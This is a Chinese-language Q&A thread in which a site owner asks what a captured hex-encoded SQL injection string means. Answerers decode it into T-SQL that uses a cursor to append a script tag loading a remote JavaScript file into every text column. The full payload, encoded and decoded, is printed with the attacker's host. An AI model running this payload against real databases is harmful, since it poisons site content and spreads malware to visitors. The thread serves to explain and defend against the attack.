12

可能重复:
尝试的 SQL 注入攻击 - 他们试图做什么?

在过去的几个月里,我多次在我的网站上看到这种 SQL 注入尝试。

';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);

浏览完我的代码后,我确信我受到了保护,因为我查询的是内存数据集而不是数据库本身。但是,即使我确定自己受到保护,但我并不完全了解这次攻击尝试发生了什么,并想弄清楚,这样我就可以避免将来编写可能容易受到攻击的代码。

谁能向我解释这些黑客试图用这段代码做什么?

谢谢。

- 此代码被附加到查询字符串并作为发布数据发送。

4

4 回答 4

20

注意:我的第一个解释是不正确的,因为我实际上并没有通读整件事......

这就是翻译的意思。它在您的数据库中搜索 text 或 varchar 列(b.xtype 在 99,35,231,167),然后将 javascript 文件注入到数据库中的所有文本列中。比我最初想象的还要恶意。

DECLARE 
    @T varchar(255),
    @C varchar(4000) 

DECLARE Table_Cursor CURSOR FOR 
    select a.name,b.name 
    from sysobjects a,syscolumns b 
    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT 
FROM  Table_Cursor 
INTO @T,@C 

WHILE(@@FETCH_STATUS=0) 
BEGIN exec('update ['+@T+'] set ['+@C+']=''">
    </title>
    <script src="http://www2.s800qn.cn/csrss/w.js"></script>
      <!--''+['+@C+'] where '+@C+' not like ''%">
    </title>
    <script src="http://www2.s800qn.cn/csrss/w.js"></script><!--'
'')
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END 

CLOSE Table_Cursor 
DEALLOCATE Table_Cursor
于 2008-12-15T22:57:22.263 回答
7

实际上,Jimmy,如果你分析这段代码,它会使用游标在数据库的每个文本字段中注入对 hxxp://www2.s800qn.cn/csrss/w.js 的 javascript 引用。

这意味着他们不关心您的数据库,他们想要的是使用您的页面从浏览它的用户那里窃取数据。

该 javascript 链接现在已失效,但它可能包含获取用户 cookie 的代码。

于 2008-12-15T23:13:16.037 回答
3

继 Jimmy 的帖子之后:您还可以使用 hex-ascii 翻译器来获得:

DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR  FOR select 
a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and 
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT 
FROM  Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN 
exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www2.s800qn.cn
/csrs/w.js"></script>''+['+@C+'] where '+@C+' not like ''%"></title><script 
src="http://www2.s800qn.cn/csrss/w.js"></script>''')FETCH NEXT FROM  Table_Cursor INTO 
@T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
于 2008-12-15T23:01:48.963 回答
2

如果您还没有发现这是一种没有针对性的自动攻击,只是为了提供帮助。包含的 .js 文件的目的是通过使用您的网站分发恶意软件,其中包含几个主要针对 IE 用户的漏洞利用。

于 2008-12-15T23:17:20.507 回答